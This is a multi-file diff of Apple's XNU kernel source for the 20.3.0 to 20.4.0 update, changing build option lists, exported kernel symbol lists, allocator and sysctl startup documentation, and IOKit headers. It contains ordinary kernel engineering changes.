 options                CONFIG_ZLEAKS   # Live zone leak debugging      # <zleaks>
 
 #
@@ -650,10 +650,6 @@ options     KPC                    # <kpc>
 
 options     PGO                    # <pgo>
 
-# MACH_COUNTERS enables code that handles various counters in the system.
-#
-options                MACH_COUNTERS   #                           # <debug>
-
 # DEVELOPMENT define for development builds
 options                DEVELOPMENT     # dev kernel                # <development>
 
@@ -742,6 +738,7 @@ options             CONFIG_SERIAL_KDP   # KDP over serial   # <config_serial_kdp>
 options                CONFIG_KDP_INTERACTIVE_DEBUGGING        # <kdp_interactive_debugging>
 
 options        CONFIG_TASKWATCH
+options        CONFIG_USER_NOTIFICATION                # <config_user_notification>
 #
 # Kernel Power On Self Tests
 #
@@ -752,11 +749,6 @@ options            CONFIG_XNUPOST                          # <config_xnupost>
 #
 options PROC_REF_DEBUG                                 # <proc_ref_debug>
 
-#
-# Kernel OS reason debug instrumentation
-#
-options OS_REASON_DEBUG                                        # <os_reason_debug>
-
 #
 # Kernel Voucher Attr Manager for Activity Trace
 #
@@ -772,6 +764,9 @@ options             CONFIG_SYSDIAGNOSE                      # <config_sysdiagnose>
 options                CONFIG_CSR                              # <config_csr>
 options                CONFIG_CSR_FROM_DT              # <config_csr_from_dt>
 
+# Enable collection of IO Compression statistics
+options                CONFIG_IO_COMPRESSION_STATS             # <config_io_compression_stats>
+
 #
 # Console options
 #
index 0dbf52e8f645198578dc3b69d9230c4b76efeb11..d5a077c24a68622ace76bc3071f962b4de40265f 100644 (file)
@@ -16,9 +16,9 @@
 #  Standard Apple OS Configurations:
 #  -------- ----- -- ---------------
 #
-#  KERNEL_BASE =    [ arm xsmall msgb_small config_embedded config_enforce_signed_code config_zcache config_darkboot ARM_EXTRAS_BASE ]
+#  KERNEL_BASE =    [ arm xsmall msgb_small config_embedded config_enforce_signed_code config_darkboot ARM_EXTRAS_BASE ]
 #  KERNEL_RELEASE = [ KERNEL_BASE ]
-#  KERNEL_DEV =     [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug os_reason_debug ]
+#  KERNEL_DEV =     [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug ]
 #  KERNEL_DEBUG =   [ KERNEL_BASE debug mach_assert config_xnupost config_ltable_stats config_ltable_debug config_waitq_stats config_workloop_debug config_waitq_debug ]
 #  BSD_BASE =       [ mach_bsd config_workqueue psynch config_proc_uuid_policy config_imageboot config_imageboot_img4 ]
 #  BSD_RELEASE =    [ BSD_BASE no_printf_str no_kprintf_str secure_kernel ]
@@ -50,7 +50,7 @@
 #  PERF_DBG_RELEASE=[ PERF_DBG_BASE ist_kdebug ]
 #  PERF_DBG_DEV =   [ PERF_DBG_BASE config_dtrace zleaks kdp_interactive_debugging interrupt_masked_debug ]
 #  PERF_DBG_DEBUG = [ PERF_DBG_BASE config_dtrace zleaks kdp_interactive_debugging interrupt_masked_debug ]
-#  MACH_BASE =      [ mach slidable vc_progress_white mdebug ipc_debug importance_inheritance config_atm config_coalitions config_library_validation config_iosched config_telemetry config_sysdiagnose config_quiesce_counter phys_write_acct ]
+#  MACH_BASE =      [ mach slidable vc_progress_white mdebug ipc_debug importance_inheritance config_atm config_coalitions config_library_validation config_iosched config_telemetry config_sysdiagnose config_quiesce_counter phys_write_acct config_io_compression_stats ]
 #  MACH_RELEASE =   [ MACH_BASE config_skip_precise_user_kernel_time debugger_for_zone_info ]
 #  MACH_DEV =       [ MACH_BASE task_zone_info config_io_accounting importance_trace config_ledger_interval_max ]
 #  MACH_DEBUG =     [ MACH_BASE task_zone_info config_io_accounting importance_trace config_ledger_interval_max importance_debug ]
index 15846736a1d1886639a31ed329d2da3aed31daa0..e8e1a0f56db18f71e0b4fa252f7fc0a9a01dde18 100644 (file)
@@ -16,9 +16,9 @@
 #  Standard Apple OS Configurations:
 #  -------- ----- -- ---------------
 #
-#  KERNEL_BASE =    [ arm64 xsmall msgb_small config_embedded config_enforce_signed_code config_requires_u32_munging config_zcache config_darkboot ARM_EXTRAS_BASE ]
+#  KERNEL_BASE =    [ arm64 xsmall msgb_small config_embedded config_enforce_signed_code config_requires_u32_munging config_darkboot ARM_EXTRAS_BASE ]
 #  KERNEL_RELEASE = [ KERNEL_BASE ]
-#  KERNEL_DEV =     [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug os_reason_debug pgtrace ]
+#  KERNEL_DEV =     [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug pgtrace ]
 #  KERNEL_DEBUG =   [ KERNEL_BASE debug mach_assert config_xnupost config_ltable_stats config_ltable_debug config_waitq_stats config_workloop_debug config_waitq_debug pgtrace ]
 #  BSD_BASE =       [ mach_bsd config_workqueue psynch config_proc_uuid_policy config_personas config_imageboot config_imageboot_img4 ]
 #  BSD_RELEASE =    [ BSD_BASE no_printf_str no_kprintf_str secure_kernel ]
@@ -52,7 +52,7 @@
 #  PERF_DBG_RELEASE=[ PERF_DBG_BASE ist_kdebug ]
 #  PERF_DBG_DEV =   [ PERF_DBG_BASE config_dtrace lock_stats zleaks kdp_interactive_debugging alternate_debugger interrupt_masked_debug ]
 #  PERF_DBG_DEBUG = [ PERF_DBG_BASE config_dtrace lock_stats zleaks kdp_interactive_debugging alternate_debugger interrupt_masked_debug ]
-#  MACH_BASE =      [ mach slidable config_ecc_logging vc_progress_white mdebug ipc_debug importance_inheritance config_atm config_coalitions config_iosched config_library_validation config_sysdiagnose config_telemetry config_mach_bridge_recv_time config_quiesce_counter phys_write_acct ]
+#  MACH_BASE =      [ mach slidable config_ecc_logging vc_progress_white mdebug ipc_debug importance_inheritance config_atm config_coalitions config_iosched config_library_validation config_sysdiagnose config_telemetry config_mach_bridge_recv_time config_quiesce_counter phys_write_acct config_io_compression_stats ]
 #  MACH_RELEASE =   [ MACH_BASE config_skip_precise_user_kernel_time debugger_for_zone_info ]
 #  MACH_DEV =       [ MACH_BASE task_zone_info config_io_accounting importance_trace config_ledger_interval_max ]
 #  MACH_DEBUG =     [ MACH_BASE task_zone_info config_io_accounting importance_trace config_ledger_interval_max importance_debug ]
index 3fd4f903c35557791ba8331cf9d9a46bf4786fa2..825b8991948ddb20b03638faddeab49b6037f7d7 100644 (file)
@@ -16,9 +16,9 @@
 #  Standard Apple OS Configurations:
 #  -------- ----- -- ---------------
 #
-#  KERNEL_BASE =    [ arm64 xsmall msgb_large config_embedded config_enforce_signed_code config_requires_u32_munging config_zcache config_darkboot ARM_EXTRAS_BASE ]
+#  KERNEL_BASE =    [ arm64 xsmall msgb_small config_embedded config_enforce_signed_code config_requires_u32_munging config_darkboot ARM_EXTRAS_BASE ]
 #  KERNEL_RELEASE = [ KERNEL_BASE ]
-#  KERNEL_DEV =     [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug os_reason_debug pgtrace ]
+#  KERNEL_DEV =     [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug pgtrace ]
 #  KERNEL_DEBUG =   [ KERNEL_BASE debug mach_assert config_xnupost config_ltable_stats config_ltable_debug config_waitq_stats config_workloop_debug config_waitq_debug pgtrace ]
 #  BSD_BASE =       [ mach_bsd config_workqueue psynch config_proc_uuid_policy config_personas config_imageboot config_imageboot_img4 ]
 #  BSD_RELEASE =    [ BSD_BASE no_printf_str no_kprintf_str secure_kernel ]
index 509472214e92048834f57470b9193d43d947820b..bdd95c53c0fa261196e04849eeff4a53896e42cd 100644 (file)
@@ -16,9 +16,9 @@
 #  Standard Apple OS Configurations:
 #  -------- ----- -- ---------------
 #
-#  KERNEL_BASE =    [ arm64 medium msgb_large config_arrow config_requires_u32_munging config_zcache config_delay_idle_sleep config_proc_udata_storage ARM_EXTRAS_BASE ]
+#  KERNEL_BASE =    [ arm64 medium msgb_large config_arrow config_requires_u32_munging config_delay_idle_sleep config_proc_udata_storage config_uexc config_darkboot ARM_EXTRAS_BASE ]
 #  KERNEL_RELEASE = [ KERNEL_BASE ]
-#  KERNEL_DEV =     [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug os_reason_debug pgtrace ]
+#  KERNEL_DEV =     [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug pgtrace ]
 #  KERNEL_DEBUG =   [ KERNEL_BASE debug mach_assert config_xnupost config_ltable_stats config_ltable_debug config_waitq_stats config_workloop_debug config_waitq_debug pgtrace ]
 #  BSD_BASE =       [ mach_bsd sysv_sem sysv_msg sysv_shm config_netboot config_imageboot config_workqueue psynch config_proc_uuid_policy config_coredump pgo config_personas ]
 #  BSD_RELEASE =    [ BSD_BASE ]
 #  VPN =            [ ipsec flow_divert necp content_filter ]
 #  PF =             [ pf pflog ]
 #  MULTIPATH =      [ multipath mptcp ]
+#if defined(SOC_CONFIG_t8020)
 #  HIBERNATION =    [ ]
+#else /*!(defined(SOC_CONFIG_t8020)*/
+#  HIBERNATION =    [ ]
+#endif /*!(defined(SOC_CONFIG_t8020)*/
 #  IOKIT_BASE =     [ iokit iokitcpp no_kernel_hid config_sleep iokitstats HIBERNATION ]
 #  IOKIT_RELEASE =  [ IOKIT_BASE ]
 #  IOKIT_DEV =      [ IOKIT_BASE iotracking ]
@@ -53,7 +57,7 @@
 #  PERF_DBG_RELEASE=[ PERF_DBG_BASE ist_kdebug ]
 #  PERF_DBG_DEV =   [ PERF_DBG_BASE lock_stats zleaks alternate_debugger interrupt_masked_debug ]
 #  PERF_DBG_DEBUG = [ PERF_DBG_BASE lock_stats zleaks alternate_debugger interrupt_masked_debug ]
-#  MACH_BASE =      [ mach slidable config_ecc_logging vc_progress_white mdebug ipc_debug importance_inheritance config_atm config_coalitions config_iosched config_sysdiagnose config_telemetry config_mach_bridge_recv_time config_quiesce_counter config_arm_pfz ]
+#  MACH_BASE =      [ mach slidable config_ecc_logging vc_progress_white mdebug ipc_debug importance_inheritance config_atm config_coalitions config_iosched config_sysdiagnose config_telemetry config_mach_bridge_recv_time config_quiesce_counter config_arm_pfz config_user_notification phys_write_acct ]
 #  MACH_RELEASE =   [ MACH_BASE debugger_for_zone_info ]
 #  MACH_DEV =       [ MACH_BASE task_zone_info config_io_accounting importance_trace config_ledger_interval_max ]
 #  MACH_DEBUG =     [ MACH_BASE task_zone_info config_io_accounting importance_trace config_ledger_interval_max importance_debug ]
index e1d6bfd92e843d5fc9710e307090deea6567078a..4ce67ae9172a4480790cfb4bce06468d5fa8e0cf 100644 (file)
@@ -17,9 +17,9 @@
 #  -------- ----- -- ---------------
 #
 #  ARM_EXTRAS_BASE = [ nos_arm_pmap nos_arm_asm ]
-#  KERNEL_BASE =    [ arm64 xsmall msgb_small config_embedded config_requires_u32_munging config_zcache ARM_EXTRAS_BASE ]
+#  KERNEL_BASE =    [ arm64 xsmall msgb_small config_embedded config_requires_u32_munging ARM_EXTRAS_BASE ]
 #  KERNEL_RELEASE = [ KERNEL_BASE ]
-#  KERNEL_DEV =     [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug os_reason_debug pgtrace ]
+#  KERNEL_DEV =     [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug pgtrace ]
 #  KERNEL_DEBUG =   [ KERNEL_BASE debug mach_assert config_xnupost config_ltable_stats config_ltable_debug config_waitq_stats config_workloop_debug config_waitq_debug pgtrace ]
 #  BSD_BASE =       [ mach_bsd config_workqueue psynch config_proc_uuid_policy config_personas ]
 #  BSD_RELEASE =    [ BSD_BASE no_printf_str no_kprintf_str secure_kernel ]
index 98852a7f7bfa5d23d4da998be11969e035f6fdce..f16f3b90606624b57ddaaa9c8fb0f58991a56dc7 100644 (file)
@@ -16,9 +16,9 @@
 #  Standard Apple OS Configurations:
 #  -------- ----- -- ---------------
 #
-#  KERNEL_BASE =    [ arm64 xsmall msgb_large config_embedded config_enforce_signed_code config_requires_u32_munging config_zcache config_darkboot ARM_EXTRAS_BASE ]
+#  KERNEL_BASE =    [ arm64 xsmall msgb_small config_embedded config_enforce_signed_code config_requires_u32_munging config_darkboot ARM_EXTRAS_BASE ]
 #  KERNEL_RELEASE = [ KERNEL_BASE ]
-#  KERNEL_DEV =     [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug os_reason_debug pgtrace ]
+#  KERNEL_DEV =     [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug pgtrace ]
 #  KERNEL_DEBUG =   [ KERNEL_BASE debug mach_assert config_xnupost config_ltable_stats config_ltable_debug config_waitq_stats config_workloop_debug config_waitq_debug pgtrace ]
 #  BSD_BASE =       [ mach_bsd config_workqueue psynch config_proc_uuid_policy config_personas config_imageboot config_imageboot_img4 ]
 #  BSD_RELEASE =    [ BSD_BASE no_printf_str no_kprintf_str secure_kernel ]
@@ -52,7 +52,7 @@
 #  PERF_DBG_RELEASE=[ PERF_DBG_BASE ist_kdebug ]
 #  PERF_DBG_DEV =   [ PERF_DBG_BASE config_dtrace lock_stats zleaks kdp_interactive_debugging alternate_debugger interrupt_masked_debug ]
 #  PERF_DBG_DEBUG = [ PERF_DBG_BASE config_dtrace lock_stats zleaks kdp_interactive_debugging alternate_debugger interrupt_masked_debug ]
-#  MACH_BASE =      [ mach slidable config_ecc_logging vc_progress_white mdebug ipc_debug importance_inheritance config_atm config_coalitions config_iosched config_library_validation config_sysdiagnose config_telemetry config_mach_bridge_recv_time config_quiesce_counter ]
+#  MACH_BASE =      [ mach slidable config_ecc_logging vc_progress_white mdebug ipc_debug importance_inheritance config_atm config_coalitions config_iosched config_library_validation config_sysdiagnose config_telemetry config_mach_bridge_recv_time config_quiesce_counter config_io_compression_stats phys_write_acct ]
 #  MACH_RELEASE =   [ MACH_BASE config_skip_precise_user_kernel_time debugger_for_zone_info ]
 #  MACH_DEV =       [ MACH_BASE task_zone_info config_io_accounting importance_trace config_ledger_interval_max ]
 #  MACH_DEBUG =     [ MACH_BASE task_zone_info config_io_accounting importance_trace config_ledger_interval_max importance_debug ]
index 31d87fd6f5bdfb1beeddf367ac928583dfa066f8..7bae7f33bf9ca0ebe6650748afda601c2374052f 100644 (file)
@@ -16,9 +16,9 @@
 #  Standard Apple OS Configurations:
 #  -------- ----- -- ---------------
 #
-#  KERNEL_BASE =    [ intel medium msgb_large config_requires_u32_munging config_zcache config_delay_idle_sleep config_proc_udata_storage vsprintf ]
+#  KERNEL_BASE =    [ intel medium msgb_large config_requires_u32_munging config_delay_idle_sleep config_proc_udata_storage vsprintf ]
 #  KERNEL_RELEASE = [ KERNEL_BASE ]
-#  KERNEL_DEV =     [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug os_reason_debug ]
+#  KERNEL_DEV =     [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug ]
 #  KERNEL_DEBUG =   [ KERNEL_BASE debug mach_assert config_xnupost config_ltable_stats config_ltable_debug config_waitq_stats config_workloop_debug config_waitq_debug ]
 #  BSD_BASE =       [ mach_bsd sysv_sem sysv_msg sysv_shm config_netboot config_imageboot config_imageboot_chunklist config_workqueue psynch config_proc_uuid_policy config_coredump pgo config_32bit_telemetry config_personas ]
 #  BSD_RELEASE =    [ BSD_BASE ]
@@ -48,7 +48,7 @@
 #  PERF_DBG_RELEASE=[ PERF_DBG_BASE ]
 #  PERF_DBG_DEV    =[ PERF_DBG_BASE lock_stats ]
 #  PERF_DBG_DEBUG = [ PERF_DBG_BASE lock_stats ]
-#  MACH_BASE =      [ mach config_kext_basement mdebug ipc_debug config_mca config_vmx config_mtrr config_lapic config_telemetry importance_inheritance config_atm config_coalitions hypervisor config_iosched config_sysdiagnose config_mach_bridge_send_time copyout_shim phys_write_acct ]
+#  MACH_BASE =      [ mach config_kext_basement mdebug ipc_debug config_mca config_vmx config_mtrr config_lapic config_telemetry importance_inheritance config_atm config_coalitions hypervisor config_iosched config_sysdiagnose config_mach_bridge_send_time copyout_shim phys_write_acct config_user_notification ]
 #  MACH_RELEASE =   [ MACH_BASE ]
 #  MACH_DEV =       [ MACH_BASE task_zone_info importance_trace config_ledger_interval_max ]
 #  MACH_DEBUG =     [ MACH_BASE task_zone_info importance_trace config_ledger_interval_max importance_debug ]
index 7da98bbff60f2f5d2411c4bbabfad07ac7a14d15..11d867f00025cf35f033a23fb7a4694a9b31066c 100644 (file)
@@ -1,4 +1,4 @@
-20.3.0
+20.4.0
 
 # The first line of this file contains the master version number for the kernel.
 # All other instances of the kernel version in xnu are derived from this file.
index 8091f7218faaf938c6e0ca2428cc82559f3cc781..a3af4d729805e4b3a3fe053a4ed333fbe24b1306 100644 (file)
@@ -13,6 +13,7 @@ _ml_get_conttime_offset
 _ml_get_wake_timebase
 _ml_set_reset_time
 _proc_getcdhash
+_ml_cpu_init_completed
 _cpu_broadcast_xcall
 _cpu_xcall
 _cpu_broadcast_immediate_xcall
index 1c0e13e390746e35f0cf47386a1d69ba78f66d7d..09e5a5df76be374eaa26f51fcc948ebc5b96bb93 100644 (file)
@@ -41,6 +41,7 @@ _sched_perfcontrol_edge_matrix_set
 _sched_perfcontrol_update_callback_deadline
 _thread_group_join_io_storage
 _thread_group_join_perf_controller
+_ml_cpu_init_completed
 _ml_cpu_signal
 _ml_cpu_signal_deferred
 _ml_cpu_signal_retract
@@ -70,8 +71,6 @@ _pmap_iommu_map
 _pmap_iommu_unmap
 _pmap_iommu_iovmfree
 _pmap_iommu_ioctl
-_pmap_iommu_grant_page
-_pmap_iommu_alloc_contiguous_pages
 _nvme_ppl_get_desc
 _sart_get_desc
 _t8020dart_get_desc
index 28b023dd9626a09f202094b8e571847a233da114..71f343419ccb7655d9a0cbfef0f05f1a603dcd87 100644 (file)
@@ -3,7 +3,6 @@ __ZN15IORegistryEntry18setIndexedPropertyEjP8OSObject
 __ZNK15IORegistryEntry18getIndexedPropertyEj
 __ZN16IOPlatformExpert*
 __ZNK16IOPlatformExpert*
-__ZN18IOMemoryDescriptor16setPreparationIDEv
 __ZTV16IOPlatformExpert
 __ZN18IODTPlatformExpert*
 __ZNK18IODTPlatformExpert*
@@ -149,6 +148,8 @@ _bufattr_markisochronous
 _bufattr_markmeta
 _bufattr_markquickcomplete
 _bufattr_meta
+_bufattr_markexpeditedmeta
+_bufattr_expeditedmeta
 _bufattr_nocache
 _bufattr_passive
 _bufattr_quickcomplete
@@ -466,6 +467,10 @@ _kern_packet_append
 _kern_packet_get_next
 _kern_packet_set_chain_counts
 _kern_packet_get_chain_counts
+_kern_packet_trace_start
+_kern_packet_trace_end
+_kern_packet_is_traced
+_kern_packet_trace_event
 _kern_pbufpool_alloc
 _kern_pbufpool_alloc_batch
 _kern_pbufpool_alloc_batch_callback
@@ -491,6 +496,7 @@ _kern_config_is_development
 _kern_stack_snapshot_with_reason
 _kernel_debug_string
 _kext_receipt
+_kext_receipt_set_queried
 _kmem_alloc_kobject:_kmem_alloc_kobject_external
 _kmem_alloc_pageable:_kmem_alloc_pageable_external
 _kx_qsort
@@ -598,6 +604,8 @@ _pmap_load_image4_trust_cache
 _pmap_lockdown_image4_slab
 _pmap_lookup_in_static_trust_cache
 _pmap_lookup_in_loaded_trust_caches
+_pmap_set_compilation_service_cdhash
+_pmap_match_compilation_service_cdhash
 _port_name_to_task
 _port_name_to_thread
 _post_sys_powersource
@@ -621,6 +629,7 @@ _proc_set_syscall_filter_callbacks
 _proc_set_syscall_filter_index
 _proc_set_syscall_filter_mask
 _proc_selfcsflags
+_proc_skip_mtime_update
 _proc_starttime
 _proc_task
 _proc_uniqueid
@@ -717,6 +726,7 @@ _throttle_lowpri_io_will_be_throttled
 _throttle_lowpri_window
 _throttle_set_thread_io_policy
 _throttle_get_thread_effective_io_policy
+_throttle_thread_io_tier_above_metadata
 _timeout
 _timeout_with_leeway
 _tk_nin
@@ -751,10 +761,12 @@ _utun_ctl_register_dtls
 _utun_pkt_dtls_input
 _vfs_context_bind
 _vfs_context_can_resolve_triggers
+_vfs_context_dataless_materialization_is_prevented
 _vfs_context_get_special_port
 _vfs_context_set_special_port
 _vfs_context_is_dataless_manipulator
 _vfs_devvp
+_vfs_get_thread_fs_private
 _vfs_getattr
 _vfs_getbyid
 _vfs_is_basesystem
@@ -762,6 +774,7 @@ _vfs_mntlabel
 _vfs_mount_id
 _vfs_nativexattrs
 _vfs_set_root_unmounted_cleanly
+_vfs_set_thread_fs_private
 _vfs_setcompoundopen
 _vfs_throttle_mask
 _vfs_vnodecovered
index 7983266f347bc3543a6c8192a167df842d12d12e..83401d90a0b25828df0f4b74ee791aec26a06cc0 100644 (file)
@@ -2,9 +2,10 @@ _IOGetBootKeyStoreData
 _IOGetAPFSKeyStoreData
 _IOSetAPFSKeyStoreData
 _IOGetARVRootHashData
-_IOSetARVRootHashData
 _IOGetARVManifestData
-_IOSetARVManifestData
+_IOGetBaseSystemARVRootHashData
+_IOGetBaseSystemARVManifestData
+_IOBaseSystemARVRootHashAvailable
 __Z33IOSKCopyKextIdentifierWithAddressm
 __ZN14IOPMrootDomain17requestUserActiveEP9IOServicePKc
 __ZN14IOPMrootDomain20claimSystemBootEventEP9IOServicejPKcP8OSObject
@@ -113,6 +114,7 @@ _hv_ast_pending
 _hv_disable
 _hv_ept_pmap_create
 _hv_get*
+_hv_io_notifier*
 _hv_release*
 _hv_set*
 _hv_trace*
index dbe2508521a3131b399a110fd1ed38f2d28fda76..6ad33d6fdfa91adc5ab6362469e608c50cc1102a 100644 (file)
@@ -34,3 +34,8 @@ __ZN18IODTPlatformExpert28_RESERVEDIODTPlatformExpert4Ev
 __ZN18IODTPlatformExpert28_RESERVEDIODTPlatformExpert5Ev
 __ZN18IODTPlatformExpert28_RESERVEDIODTPlatformExpert6Ev
 __ZN18IODTPlatformExpert28_RESERVEDIODTPlatformExpert7Ev
+_KUNCExecute
+_KUNCGetNotificationID
+_KUNCUserNotificationDisplayAlert
+_KUNCUserNotificationDisplayFromBundle
+_KUNCUserNotificationDisplayNotice
index d83a6923b64355fa171b8c531a725399159c1f0e..cb57707545f18bbfeb47fd7c5b9322498597b83d 100644 (file)
@@ -1,9 +1,4 @@
 _Debugger
-_KUNCExecute
-_KUNCGetNotificationID
-_KUNCUserNotificationDisplayAlert
-_KUNCUserNotificationDisplayFromBundle
-_KUNCUserNotificationDisplayNotice
 _NDR_record
 _OSSpinLockTry
 _OSSpinLockUnlock
index 927f16da90606a1e8d5cbe95889e747c08cf6343..b49ffcab9cefe0d545c08aa71ab79ec430c8fe89 100644 (file)
@@ -14,3 +14,8 @@ __ZN5IORTC15_RESERVEDIORTC4Ev
 __ZN5IORTC15_RESERVEDIORTC5Ev
 __ZN5IORTC15_RESERVEDIORTC6Ev
 __ZN5IORTC15_RESERVEDIORTC7Ev
+_KUNCExecute
+_KUNCGetNotificationID
+_KUNCUserNotificationDisplayAlert
+_KUNCUserNotificationDisplayFromBundle
+_KUNCUserNotificationDisplayNotice
index a56a15f2f53bf710d4c909fa374d27d98fb7d49a..744ae9c6b2b4b69d6a751a120dc85c8086a82cc2 100755 (executable)
@@ -15,6 +15,11 @@ if [ "${OUTPUT##*.}" != "plist" -o "${PLIST##*.}" != "plist" ]; then
 fi
 shift 2
 
+if [ $(egrep -c 'CFBundleIdentifier|OSBundleCompatibleVersion|CFBundleVersion' $PLIST) -lt 3 ]; then
+    echo "error: Invalid input Info.plist $PLIST" 1>&2
+    exit 1
+fi
+
 printf \
 '<?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
index 55a844ea8082bc092303b3da05a8649fb4414753..bc9deb57c8eec5288220eef67ee1493abc19841e 100644 (file)
@@ -56,7 +56,7 @@ For all `kalloc` or `kheap_alloc` variants, these advices apply:
 
 - If your allocation size is of fixed size, of a sub-page size, and done with
   the `Z_WAITOK` semantics (allocation can block), consider adding `Z_NOFAIL`,
-- If you `bzero` the memory on allocation, prefer passing `Z_ZERO` which can be
+- If you `bzero` the memory on allocation, instead pass `Z_ZERO` which can be
   optimized away more often than not.
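Taken together, the advice above amounts to something like this sketch; the entry point, heap constant, and flag names are assumptions based on the allocator headers on this branch:

    struct widget {
            uint64_t id;
            uint32_t busy;
    };

    static struct widget *
    widget_create(void)
    {
            /* Fixed-size, sub-page, blocking allocation: Z_NOFAIL is allowed here,
             * and Z_ZERO replaces a separate bzero() of the result. */
            return kheap_alloc(KHEAP_DEFAULT, sizeof(struct widget),
                       Z_WAITOK | Z_ZERO | Z_NOFAIL);
    }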
 
 ### Considerations for zones
@@ -83,7 +83,7 @@ Security wise, the following questions need answering:
 
 There are several allocation wrappers in XNU, present for various reasons
 ranging from additional accounting features (IOKit's `IONew`), conformance to
-langauge requirements (C++ various `new` operators) or organical historical
+language requirements (C++ various `new` operators) or organic historical
 reasons.
 
 `zalloc` and `kalloc` are considered the primitive allocation interfaces which
index 15e587dfe57540c60073b3c41764e703d244d712..92e528f8c88fc3b398a468d2a22edabef92df08a 100644 (file)
@@ -189,6 +189,8 @@ Initializes the percpu subsystem.
 Rank 1: allocates the percpu memory, `percpu_foreach_base` and `percpu_foreach`
         become usable.
 
+Rank 2: sets up static percpu counters.
+
 
 `STARTUP_SUB_LOCKS`
 -------------------
@@ -205,7 +207,6 @@ tracing features). Available hooks are:
 
 - Rank 1: `LCK_MTX_DECLARE`.
 
-
 `STARTUP_SUB_CODESIGNING`
 -------------------------
 
@@ -243,6 +244,21 @@ Initializes the Mach IPC subsystem.
 - Rank last: Final IPC initialization.
 
 
+`STARTUP_SUB_SYSCTL`
+-------------------------
+
+### Description
+
+Initializes the sysctl kernel subsystem.
+
+### Rank usage
+
+- Rank 1: automatic `SYSCTL_NODE` registration.
+- Rank 2: automatic `SYSCTL_OID` registration.
+- Middle: other manual early registrations.
+- Last: registrations of dummy nodes in the constant nodes to allow extension.
+
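For reference, the kind of static declarations that ranks 1 and 2 pick up automatically; the OID names here are invented:

    /* Rank 1 registers the node, rank 2 registers the leaf OID. */
    SYSCTL_NODE(_debug, OID_AUTO, example, CTLFLAG_RW | CTLFLAG_LOCKED, 0, "example node");

    static int example_enabled = 1;
    SYSCTL_INT(_debug_example, OID_AUTO, enabled,
        CTLFLAG_RW | CTLFLAG_LOCKED, &example_enabled, 0, "example tunable");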
+
 `STARTUP_SUB_EARLY_BOOT`
 ------------------------
 
@@ -271,5 +287,3 @@ When the kernel locks down:
 ### Rank usage
 
 N/A.
-
-
index 478a721f9f3924bd569abc0e675dfbe97d1ec100..9c23a9be2a747560a7adb7f12e15c5de2625fd47 100644 (file)
@@ -106,6 +106,15 @@ public:
        virtual kern_return_t
        Stop(IOService * provider) LOCAL;
 
+       /*! @function   ClientCrashed
+        * @discussion  Notification for kernel objects of a client crash.
+        * @param       client Attached client.
+        * @param       options No options are currently defined.
+        * @return      kIOReturnSuccess on success. See IOReturn.h for error codes.
+        */
+       virtual kern_return_t
+       ClientCrashed(IOService * client, uint64_t options);
+
     /*!
      * @brief       Obtain IOKit IORegistryEntryID.
      * @param       registryEntryID IORegistryEntryID for the IOKit object.
index 10c76c8528d36baa3b05b5b10809e9b5de9f4d14..3c9633969c860aa7763e10408886f1a54d28d503 100644 (file)
@@ -88,8 +88,9 @@ enum {
  * @field       scalarOutput Array of scalars to return to the caller.
  * @field       scalarOutputCount Count of scalars to return to the caller in scalarOutput.
  * @field       structureOutput An OSData to be returned to the caller as structure output.
- *                             A reference will be consumed by the caller. It is an error to set this field if
- *              structureOutputDescriptor was passed in
+ *              This field should be set by the driver to an OSData object it created with
+ *              the data to be returned, and the OSData instance will be released by the OS.
+ *              It is an error for the driver to set this field if structureOutputDescriptor was passed in
  * @field       structureOutputDescriptor A IOMemoryDescriptor specified by the caller for structure output.
  * @field       structureOutputMaximumSize Maximum size of structure output specified by caller
  *              or kIOUserClientVariableStructureSize.
index 992e3a9fe85e48b029ef8c851118b9827a0308c1..dbc6aaaf55838c2bc27f48986dcca46e77860eb4 100644 (file)
 // care.
 #define kIONVRAMForceSyncNowPropertyKey         "IONVRAM-FORCESYNCNOW-PROPERTY"
 
+// GUID to address variables for the system NVRAM region
+#define kIOKitSystemGUID                        "40A0DDD2-77F8-4392-B4A3-1E7304206516"
+#define kIOKitSystemGUIDPrefix                  (kIOKitSystemGUID ":")
+// Internal only key to give access to system region on internal builds
+#define kIONVRAMSystemInternalAllowKey          "com.apple.private.iokit.system-nvram-internal-allow"
+
 
 // clientHasPrivilege security token for kIOClientPrivilegeSecureConsoleProcess
 typedef struct _IOUCProcessToken {
@@ -90,12 +96,12 @@ typedef struct _IOUCProcessToken {
 #define kIOPlatformFunctionHandlerSet                "IOPlatformFunctionHandlerSet"
 
 #define kIOPlatformFunctionHandlerMaxBusDelay        "IOPlatformFunctionHandlerMaxBusDelay"
-#define kIOPlatformMaxBusDelay        "IOPlatformMaxBusDelay"
+#define kIOPlatformMaxBusDelay                       "IOPlatformMaxBusDelay"
 
 #if defined(__i386__) || defined(__x86_64__)
 
 #define kIOPlatformFunctionHandlerMaxInterruptDelay  "IOPlatformFunctionHandlerMaxInterruptDelay"
-#define kIOPlatformMaxInterruptDelay  "IOPlatformMaxInterruptDelay"
+#define kIOPlatformMaxInterruptDelay                 "IOPlatformMaxInterruptDelay"
 
 #endif /* defined(__i386__) || defined(__x86_64__) */
 
index 55973bad621682535e844b0332eeb9370662f537..3cb427cfc0f36941d0b18feee38dc7196cbb180b 100644 (file)
@@ -169,6 +169,7 @@ extern io_object_t iokit_lookup_uext_ref_current_task(mach_port_name_t name);
 
 extern void iokit_retain_port( ipc_port_t port );
 extern void iokit_release_port( ipc_port_t port );
+extern void iokit_make_port_send( ipc_port_t port );
 extern void iokit_release_port_send( ipc_port_t port );
 
 extern void iokit_lock_port(ipc_port_t port);
index dc944236e46199819d4739e5f6dca8daa60aebcb..3ddc39fdfcf4de57868670ece48c54e3436262ae 100644 (file)
@@ -840,6 +840,7 @@ class IOMemoryMap : public OSObject
